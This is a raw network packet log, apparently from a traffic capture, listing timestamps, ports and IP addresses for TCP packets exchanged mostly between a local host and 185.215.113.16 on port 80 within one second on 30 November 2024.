Nov 30, 2024 04:06:44.353480101 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.353490114 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.353513002 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.353547096 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.355798006 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.355871916 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.355926991 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.355994940 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.356924057 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.356980085 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.357068062 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.357789993 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.357799053 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.357837915 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.358365059 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.358376980 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.358452082 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.359324932 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.359477997 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.359584093 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.360300064 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.360347033 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.360441923 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.360635042 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.361166000 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.361258984 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.361325979 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.361412048 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.362071991 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.362235069 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.362876892 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.363045931 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.363096952 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.363236904 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.363353968 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.364103079 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.364155054 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.364258051 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.364295006 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.365026951 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.365186930 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.365227938 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.366061926 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.366206884 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.366906881 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.367075920 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.367950916 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.368108034 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.368870974 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.369031906 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.369365931 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.369385958 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.369872093 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.369929075 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.379317045 CET	49857	443	192.168.2.4	35.190.72.216
Nov 30, 2024 04:06:44.379340887 CET	443	49857	35.190.72.216	192.168.2.4
Nov 30, 2024 04:06:44.379628897 CET	49857	443	192.168.2.4	35.190.72.216
Nov 30, 2024 04:06:44.384895086 CET	49857	443	192.168.2.4	35.190.72.216
Nov 30, 2024 04:06:44.384908915 CET	443	49857	35.190.72.216	192.168.2.4
Nov 30, 2024 04:06:44.498869896 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.498883009 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.498992920 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.499211073 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.499227047 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.499243021 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.499252081 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.499284983 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.499309063 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.501715899 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.501841068 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.501890898 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.502610922 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.502679110 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.502778053 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.502924919 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.503515005 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.503526926 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.503659964 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.504129887 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.504142046 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.504189968 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.527802944 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.527914047 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.527956009 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.528121948 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.528213024 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.528249025 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.528589964 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.529238939 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.529356956 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.529369116 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.529405117 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.530108929 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.530261993 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.531138897 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.531299114 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.531610012 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.531961918 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.532011032 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.532155037 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.532763958 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.533078909 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.533253908 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.533267975 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.533282042 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.534044981 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.534182072 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.534229994 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.534881115 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.534959078 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.535021067 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.535063028 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.535512924 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.535522938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.535536051 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.535579920 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.535686970 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.538117886 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.538172960 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.538276911 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.538533926 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.539189100 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.539200068 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.539244890 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.539778948 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.539908886 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.540775061 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.540785074 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.541735888 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.541899920 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.542632103 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.542784929 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.542932987 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.543526888 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.543629885 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.543665886 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.543796062 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.544538021 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.544682980 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.545584917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.545773029 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.545820951 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.546099901 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.546524048 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.546678066 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.546693087 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.546802998 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.547419071 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.547544003 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.547713995 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.547780991 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.548523903 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.548691034 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.548753977 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.549365997 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.549530029 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.550256968 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.550400019 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.551388979 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.551398993 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.552112103 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.552417040 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.553235054 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.553528070 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.553560972 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.553631067 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.554234982 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.554341078 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.554366112 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.554435968 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.555152893 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.555165052 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.555218935 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.556132078 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.556262016 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.557116985 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.557130098 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.557281971 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.557296038 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.557413101 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.558077097 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.558120012 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.558267117 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.558310986 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.558950901 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.559108973 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.559530973 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.559962988 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.560103893 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.560180902 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.561003923 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.561014891 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.561058044 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.561871052 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.561916113 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.562022924 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.562778950 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.562796116 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.562912941 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.562949896 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.563074112 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.563870907 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.563999891 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.564045906 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.564697027 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.564847946 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.564903975 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.565723896 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.565881968 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.565931082 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.566761017 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.566885948 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.566921949 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.566999912 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.567675114 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.567686081 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.567732096 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.568736076 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.568747044 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.568789959 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.569503069 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.569600105 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.569696903 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.570468903 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.570513964 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.570662022 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.570708036 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.571418047 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.571466923 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.698889017 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.699016094 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.699033976 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.699079990 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.699378967 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.699489117 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.699537039 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.700340033 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.700403929 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.700495005 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.700788021 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.701280117 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.701394081 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.701437950 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.702234030 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.702294111 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.702351093 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.702399015 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.703198910 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.703238964 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.703310013 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.703485966 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.704158068 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.704242945 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.704293013 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.727965117 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.728058100 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.728352070 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.728444099 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.728528976 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.728552103 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.728605032 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.729417086 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.729528904 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.729577065 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.730357885 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.730439901 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.730457067 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.730633974 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.731328011 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.731379032 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.731415987 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.731466055 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.732280016 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.732330084 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.732467890 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.732513905 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.733258963 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.733340025 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.733393908 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.733509064 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.734210014 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.734304905 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.734389067 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.735162973 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.735217094 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.735328913 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.735382080 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.736126900 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.736179113 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.736244917 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.736294031 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.737104893 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.737158060 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.737159014 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.737198114 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.738054991 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.738178015 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.738241911 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.739016056 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.739077091 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.739100933 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.739164114 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.739980936 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.740056992 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.740087986 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.740186930 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.740951061 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.740998983 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.741035938 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.741084099 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.742041111 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.742090940 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.742094040 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.742135048 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.742835999 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.742883921 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.742940903 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.742989063 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.743828058 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.743918896 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.744770050 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.744880915 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.745743990 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.745798111 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.745853901 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.746324062 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.746694088 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.746746063 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.746779919 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.746823072 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.747661114 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.747705936 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.747736931 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.747780085 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.748610973 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.748728037 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.748811960 CET	49840	80	192.168.2.4	185.215.113.16
Nov 30, 2024 04:06:44.749577045 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.749684095 CET	80	49840	185.215.113.16	192.168.2.4
Nov 30, 2024 04:06:44.749735117 CET	49840	80	192.168.2.4	185.215.113.16
